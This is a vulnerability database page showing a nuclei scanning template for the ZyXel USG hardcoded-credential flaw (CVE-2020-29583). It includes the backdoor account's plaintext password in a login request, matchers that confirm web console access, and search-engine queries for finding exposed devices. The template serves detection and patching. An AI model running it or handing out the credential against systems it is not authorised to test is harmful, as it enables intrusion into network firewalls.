Lucene search
K

ZyXel USG - Hardcoded Credentials

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 105 Views

ZyXel USG - Hardcoded Credentials, critical vulnerability, automatic firmware updates, unauthorized access, firmware update require

Related
Refs
Code
id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the affected device, potentially leading to further compromise of the network.
  remediation: |
    Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
    - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
    epss-score: 0.90049
    epss-percentile: 0.9978
    cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zyxel
    product: usg20-vpn_firmware
    shodan-query:
      - title:"USG FLEX 100"
      - http.title:"usg flex 100"
    fofa-query: title="usg flex 100"
    google-query: intitle:"usg flex 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev,vkev,vuln

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration"></a>'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022017ad350f9fc87413f0fc34f21e35fab2d85861fab8a1e7c98ef304a5b6152b2502210088f4c1c0665ee5f975764737764a88475e2b43d86dfa87fe0d7fe4a363377682:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
CVSS 210
EPSS0.90049
SSVC
105